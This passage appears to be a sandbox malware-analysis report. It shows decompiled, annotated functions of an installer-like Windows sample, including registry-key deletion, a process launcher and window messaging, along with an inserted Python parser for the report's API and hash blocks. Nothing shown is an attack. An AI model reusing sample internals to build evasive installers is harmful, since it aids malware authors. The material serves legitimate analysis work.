                                                                          				long _t14;
                                                                          
                                                                          				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
                                                                          				if(_t14 == 0) {
                                                                          					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                          						if(_a12 != 0) {
                                                                          							RegCloseKey(_v8);
                                                                          							return 1;
                                                                          						}
                                                                          						if(E00402ADA(_v8,  &_v272, 0) != 0) {
                                                                          							break;
                                                                          						}
                                                                          					}
                                                                          					RegCloseKey(_v8);
                                                                          					return RegDeleteKeyA(_a4, _a8);
                                                                          				}
                                                                          				return _t14;
                                                                          			}

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Close$DeleteEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1912718029-0
                                                                          • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                          • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                                          • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                          • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00401D32() {
                                                                          				// Dialog-bitmap entry of the instruction dispatcher: load a bitmap from a file and put it on a static control.
                                                                          				// Quality 100%: every statement resolved; the address of each statement is given as a trailing comment.
                                                                          				void* _t18;                 // previous image handle returned by STM_SETIMAGE
                                                                          				struct HINSTANCE__* _t22;   // unresolved register used as the zero constant (hInstance NULL, IMAGE_BITMAP, NULL check)
                                                                          				struct HWND__* _t25;        // static control
                                                                          				void* _t27;                 // frame pointer of the enclosing dispatcher; the ebp-relative slots are its locals
                                                                          
                                                                          				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));                                                                  // 0x00401d3e
                                                                          				GetClientRect(_t25, _t27 - 0x40);                                          // RECT at ebp-0x40                        // 0x00401d45
                                                                          				// 0x172 = STM_SETIMAGE, 0x10 = LR_LOADFROMFILE; width/height are RECT.right and RECT.bottom scaled by the factor at ebp-0x1c
                                                                          				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));  // 0x00401d74
                                                                          				if(_t18 != _t22) {                                                                                                 // 0x00401d7c
                                                                          					DeleteObject(_t18);                  // release the image the control held before                                // 0x00401d83
                                                                          				}                                                                                                                  // 0x00401d83
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));   // shared epilogue, also the tail of E00401C19 and E00401E9C  // 0x00402932
                                                                          				return 0;                                                                                                          // 0x0040293e
                                                                          			}

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 00401D38
                                                                          • GetClientRect.USER32 ref: 00401D45
                                                                          • LoadImageA.USER32 ref: 00401D66
                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                                                          • DeleteObject.GDI32(00000000), ref: 00401D83
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                          • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                                                          • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                          • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 35%
                                                                          			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                          				// Builds "<prefix><int>.<frac><unit><suffix>" from the size _a12 and writes it into dialog item _a4.
                                                                          				// Quality 35%: the decompiler lost the register loaded by the _push/_pop pairs (the shift count, 20 or 10,
                                                                          				// that the ">> 0" expressions below really use) and mangled the rounding step at 0x00404578-0x00404587.
                                                                          				// The address of each statement is given as a trailing comment.
                                                                          				char _v36;                  // suffix string, fetched with index 0xffffffdf
                                                                          				char _v68;                  // unit string, fetched with index _t34
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				unsigned int _t21;          // declaration missing from the decompiler output
                                                                          				void* _t26;
                                                                          				void* _t34;                 // unit-string index
                                                                          				signed int _t36;
                                                                          				signed int _t39;
                                                                          				unsigned int _t46;          // size being formatted
                                                                          
                                                                          				_t46 = _a12;                                                                                          // 0x0040454d
                                                                          				_push(0x14);                               // shift count 20: largest unit                             // 0x00404551
                                                                          				_pop(0);                                                                                              // 0x00404559
                                                                          				_t34 = 0xffffffdc;                         // unit string for the largest unit                          // 0x0040455c
                                                                          				if(_t46 < 0x100000) {                      // below 2^20: one unit down                                 // 0x0040455d
                                                                          					_push(0xa);                            // shift count 10                                            // 0x0040455f
                                                                          					_pop(0);                                                                                          // 0x00404561
                                                                          					_t34 = 0xffffffdd;                                                                                // 0x00404564
                                                                          				}                                                                                                     // 0x00404564
                                                                          				if(_t46 < 0x400) {                         // below 2^10: smallest unit                                 // 0x0040456b
                                                                          					_t34 = 0xffffffde;                                                                                // 0x00404571
                                                                          				}                                                                                                     // 0x00404571
                                                                          				if(_t46 < 0xffff3333) {                    // rounding step; the arithmetic below is not reliable       // 0x00404578
                                                                          					_t39 = 0x14;                                                                                      // 0x00404583
                                                                          					asm("cdq");                                                                                       // 0x00404584
                                                                          					_t46 = _t46 + 1 / _t39;                                                                           // 0x00404587
                                                                          				}                                                                                                     // 0x00404587
                                                                          				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));      // last %s: suffix                            // 0x00404594
                                                                          				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));            // %s: unit                                    // 0x0040459f
                                                                          				_t21 = _t46 & 0x00ffffff;                                 // remainder below the unit                    // 0x004045a2
                                                                          				_t36 = 0xa;                                                                                           // 0x004045b4
                                                                          				// x + 4x + x + 4x = 10x, so this is ((remainder * 10) >> shift) % 10: one fractional decimal digit
                                                                          				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);                 // 0x004045bb
                                                                          				_push(_t46 >> 0);                                         // first %u: integer part (shift count lost)   // 0x004045bc
                                                                          				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);       // prefix string _a8 into the buffer at 0x79f580 // 0x004045cb
                                                                          				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");        // append the size after the prefix          // 0x004045db
                                                                          				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);        // *0x7a2758 holds the dialog window handle   // 0x004045f7
                                                                          			}

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                                                          • wsprintfA.USER32 ref: 004045DB
                                                                          • SetDlgItemTextA.USER32 ref: 004045EE
                                                                          Strings
                                                                          • %u.%u%s%s
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s
                                                                          • API String ID: 3540041739-3551169577
                                                                          • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                          • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                                                          • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                          • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
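The APIs and Similarity lines printed under each decompiled function follow a fixed layout (`• Api.MODULE(args), ref: address` and `• Key: value`), which makes them easy to mine when triaging one report or comparing several. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses such blocks into records, extracts the API call sequence and any printf-style format strings seen in call arguments, and builds an Opcode ID index for cross-report matching. Its `SAMPLE` text is copied from the E00401D32 and E00404545 entries above; the record layout and helper names are this example's own choices.

```python
"""Parse the per-function "APIs" and "Similarity" blocks of a Joe Sandbox
decompilation listing (as on this page) into records that can be filtered,
diffed or indexed across reports.

Added example; not part of the report. SAMPLE is copied from the E00401D32
and E00404545 entries; the record layout and helper names are this
example's own choices."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Lines copied from the report page (two function entries, C body omitted).
SAMPLE = """\
C-Code - Quality: 100%
E00401D32() {
APIs
• GetDlgItem.USER32 ref: 00401D38
• GetClientRect.USER32 ref: 00401D45
• LoadImageA.USER32 ref: 00401D66
• SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
• DeleteObject.GDI32(00000000), ref: 00401D83
Memory Dump Source
• Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
Uniqueness
Uniqueness Score: -1.00%
C-Code - Quality: 35%
E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
APIs
• lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
• wsprintfA.USER32 ref: 004045DB
• SetDlgItemTextA.USER32 ref: 004045EE
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
"""

QUAL_RE = re.compile(r"^C-Code - Quality:\s*(\d+)%")
FUNC_RE = re.compile(r"^(E[0-9A-F]{8})\(")
API_RE = re.compile(
    r"^[•*]?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<addr>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^[•*]?\s*(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Similarity", "Memory Dump Source", "Uniqueness"}


@dataclass
class ApiCall:
    api: str
    module: str
    address: int              # call-site address from "ref:"
    args: tuple[str, ...]     # static argument values as printed, "?" when unknown


@dataclass
class Block:
    function: str             # decompiler name, e.g. E00401D32
    quality: int              # "C-Code - Quality" percentage
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)   # Similarity key/value lines


def parse_report(text: str) -> list[Block]:
    """Split a listing into one Block per decompiled function."""
    blocks: list[Block] = []
    section = None
    quality = -1
    for raw in text.splitlines():
        line = raw.strip()
        if q := QUAL_RE.match(line):
            quality, section = int(q.group(1)), "code"
        elif (f := FUNC_RE.match(line)) and section == "code":
            blocks.append(Block(f.group(1), quality))
        elif line in SECTIONS:
            section = line
        elif blocks and section == "APIs" and (m := API_RE.match(line)):
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            blocks[-1].calls.append(ApiCall(m["api"], m["module"], int(m["addr"], 16), args))
        elif blocks and section == "Similarity" and (m := KV_RE.match(line)):
            blocks[-1].meta[m["key"].strip()] = m["val"].strip()
    return blocks


def api_sequence(block: Block) -> list[str]:
    """API names in call-site order; the order is what distinguishes e.g. load-then-set from set-then-load."""
    return [c.api for c in sorted(block.calls, key=lambda c: c.address)]


def format_strings(blocks: list[Block]) -> dict[str, list[str]]:
    """Functions that pass a printf-style format string to some API, keyed by function name."""
    out: dict[str, list[str]] = {}
    for b in blocks:
        fmts = sorted({a for c in b.calls for a in c.args if "%" in a})
        if fmts:
            out[b.function] = fmts
    return out


def index_by_opcode_id(blocks: list[Block]) -> dict[str, str]:
    """Opcode ID -> function name, for matching functions across reports of different samples."""
    return {b.meta["Opcode ID"]: b.function for b in blocks if "Opcode ID" in b.meta}


if __name__ == "__main__":
    parsed = parse_report(SAMPLE)
    for b in parsed:
        print(f"{b.function} (quality {b.quality}%): {' -> '.join(api_sequence(b))}")
    print("format strings:", format_strings(parsed))
    print("opcode ids:", index_by_opcode_id(parsed))
```

Running two reports through `index_by_opcode_id` and intersecting the keys lists functions with identical opcode sequences, which is the quickest way to tell whether a new sample reuses the same unpacking stub as this one; `format_strings` is a cheap filter for the functions that assemble text, which in a report this size are worth reading first.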

                                                                          C-Code - Quality: 54%
                                                                          			E00401C19(void* __ecx) {
                                                                          				// SendMessage / FindWindow entry of the instruction dispatcher.
                                                                          				// Quality 54%: _t29, _t44 and _t53 are registers the decompiler could not resolve (left undeclared in its
                                                                          				// output; _t44 is only ever used as zero), and __ebp is the same frame pointer as _t58.
                                                                          				// The address of each statement is given as a trailing comment.
                                                                          				signed int _t30;
                                                                          				CHAR* _t33;
                                                                          				long _t34;                  // message result or found window
                                                                          				int _t39;                   // message id
                                                                          				signed int _t40;
                                                                          				int _t44;                   // unresolved register, used as zero (and so SMTO_NORMAL below)
                                                                          				void* _t46;
                                                                          				int _t51;                   // timeout in ms, taken from the flags word
                                                                          				struct HWND__* _t55;        // target window
                                                                          				void* _t58;                 // frame pointer of the enclosing dispatcher
                                                                          
                                                                          				_t46 = __ecx;                                                                                             // 0x00401c19
                                                                          				 *(_t58 - 8) = E00402A9A(0x33);              // wParam operand, fetched as a string                       // 0x00401c22
                                                                          				 *(_t58 + 8) = E00402A9A(0x44);              // lParam operand, fetched as a string                       // 0x00401c2e
                                                                          				if(( *(_t58 - 0x10) & 0x00000001) == 0) {    // flags bit 0 clear: wParam is numeric                     // 0x00401c31
                                                                          					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));   // string to integer   // 0x00401c3b
                                                                          				}                                                                                                         // 0x00401c3b
                                                                          				__eflags =  *(_t58 - 0x10) & 0x00000002;                                                                  // 0x00401c3e
                                                                          				if(( *(_t58 - 0x10) & 0x00000002) == 0) {    // flags bit 1 clear: lParam is numeric                     // 0x00401c42
                                                                          					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));                                                         // 0x00401c4c
                                                                          				}                                                                                                         // 0x00401c4c
                                                                          				// entry selector: 0x21 ('!', the String ID listed below) takes the SendMessage path, anything else FindWindowExA
                                                                          				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;                                                           // 0x00401c4f
                                                                          				_push(1);                                                                                                 // 0x00401c53
                                                                          				if(__eflags != 0) {                                                                                       // 0x00401c55
                                                                          					_t53 = E00402A9A();                      // class name                                                  // 0x00401ca2
                                                                          					_t30 = E00402A9A();                      // window title                                                // 0x00401ca4
                                                                          					asm("sbb ecx, ecx");                     // sbb/and idiom: an empty string becomes NULL, which         // 0x00401cad
                                                                          					asm("sbb eax, eax");                     // FindWindowExA treats as "any class" / "any title"           // 0x00401cb5
                                                                          					_t33 =  ~( *_t29) & _t53;                                                                             // 0x00401cb8
                                                                          					__eflags = _t33;                                                                                      // 0x00401cb8
                                                                          					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);   // parent, child-after, class, title // 0x00401cc1
                                                                          					goto L10;                                                                                             // (no address)
                                                                          				} else {                                                                                                  // 0x00401c57
                                                                          					_t55 = E00402A7D();                      // hwnd                                                        // 0x00401c5e
                                                                          					_t39 = E00402A7D();                      // message id                                                  // 0x00401c60
                                                                          					_t51 =  *(_t58 - 0x10) >> 2;             // remaining flag bits: timeout in ms                         // 0x00401c68
                                                                          					if(__eflags == 0) {                      // no timeout: plain SendMessageA                              // 0x00401c6b
                                                                          						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));                                      // 0x00401c93
                                                                          						L10:                                                                                              // 0x00401cc7
                                                                          						 *(_t58 - 0x34) = _t34;              // result slot                                                // 0x00401cc7
                                                                          					} else {                                                                                              // 0x00401c6d
                                                                          						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);   // result written straight into the slot // 0x00401c7b
                                                                          						asm("sbb eax, eax");                                                                              // 0x00401c83
                                                                          						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;   // error flag = 1 when the call timed out or failed     // 0x00401c86
                                                                          					}                                                                                                     // 0x00401c86
                                                                          				}                                                                                                         // 0x00401c6b
                                                                          				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;                                                           // 0x00401cca
                                                                          				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {   // a result variable was requested                           // 0x00401ccd
                                                                          					_push( *(_t58 - 0x34));                                                                               // 0x00401cd3
                                                                          					E0040591D();                             // store the result into it                                   // 0x004028d7
                                                                          				}                                                                                                         // 0x004028d7
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));   // shared epilogue, also the tail of E00401D32 and E00401E9C // 0x00402932
                                                                          				return 0;                                                                                                 // 0x0040293e
                                                                          			}

                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                                                          Strings
                                                                          • !
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                          • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                                                          • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                          • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 83%
                                                                          			E00401E9C() {
                                                                          				// Exec entry of the instruction dispatcher: start a process from a command line, optionally wait for it
                                                                          				// and hand its exit code back. Quality 83%: _t13, _t24 and _t28 are registers the decompiler left
                                                                          				// undeclared; _t24 is only ever used as zero. The address of each statement is given as a trailing comment.
                                                                          				void* _t15;                 // process handle
                                                                          				void* _t24;                 // unresolved register used as the zero constant
                                                                          				void* _t26;
                                                                          				void* _t31;                 // frame pointer of the enclosing dispatcher
                                                                          
                                                                          				_t28 = E00402A9A(_t24);                    // command line, fetched as a string                                 // 0x00401ea2
                                                                          				E00404D62(0xffffffeb, _t13);               // helper called with the constant 0xffffffeb                        // 0x00401ea7
                                                                          				// second argument is the working directory; the decompiler resolved that pointer against the memory dump, so the
                                                                          				// literal is the analysis machine's TEMP path as it sat in a runtime buffer, not a string stored in the PE
                                                                          				_t15 = E00405247(_t28, "C:\\Users\\hardz\\AppData\\Local\\Temp");                                                // 0x00401eb2
                                                                          				 *(_t31 + 8) = _t15;                                                                                          // 0x00401eb9
                                                                          				if(_t15 == _t24) {                         // process creation failed                                          // 0x00401ebc
                                                                          					 *((intOrPtr*)(_t31 - 4)) = 1;         // error flag                                                        // 0x004026da
                                                                          				} else {                                                                                                      // 0x00401ec2
                                                                          					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {   // wait flag set                                              // 0x00401ec5
                                                                          						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {   // poll every 100 ms; 0x102 = WAIT_TIMEOUT   // 0x00401ed6
                                                                          							E00405CFC(0xf);                // helper called with 0xf (= WM_PAINT) between polls                 // 0x00401ed1
                                                                          						}                                                                                                     // 0x00401ed1
                                                                          						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);   // exit code into the result slot                     // 0x00401eeb
                                                                          						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {        // no result variable requested                       // 0x00401ef4
                                                                          							if( *(_t31 - 0x34) != _t24) {                // a non-zero exit code becomes the error flag          // 0x00401f04
                                                                          								 *((intOrPtr*)(_t31 - 4)) = 1;                                                                  // 0x00401f06
                                                                          							}                                                                                                 // 0x00401f06
                                                                          						} else {                                                                                              // 0x00401ef6
                                                                          							E0040591D(_t26,  *(_t31 - 0x34));            // store the exit code into the variable               // 0x00401efa
                                                                          						}                                                                                                     // 0x00401efa
                                                                          					}                                                                                                         // 0x00401ef4
                                                                          					_push( *(_t31 + 8));                                                                                      // 0x00401f0d
                                                                          					CloseHandle();                                                                                            // 0x00401f10
                                                                          				}                                                                                                             // 0x00401f10
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));   // shared epilogue, also the tail of E00401D32 and E00401C19 // 0x00402932
                                                                          				return 0;                                                                                                     // 0x0040293e
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                            • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                            • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                            • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                            • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                            • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                                          • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                                          • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                          • API String ID: 4003922372-501415292
                                                                          • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                          • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                                                          • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                          • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405247(CHAR* _a4, CHAR* _a8) {
                                                                          				struct _PROCESS_INFORMATION _v20;
                                                                          				signed char _t10;
                                                                          				int _t12;
                                                                          
                                                                          				0x7a1588->cb = 0x44;
                                                                          				_t10 = GetFileAttributesA(_a8);
                                                                          				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
                                                                          					_a8 = 0;
                                                                          				}
                                                                          				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
                                                                          				if(_t12 != 0) {
                                                                          					CloseHandle(_v20.hThread);
                                                                          					return _v20.hProcess;
                                                                          				}
                                                                          				return _t12;
                                                                          			}

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                          • CloseHandle.KERNEL32(?), ref: 00405290
                                                                          Strings
                                                                          • Error launching installer, xrefs: 00405247
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
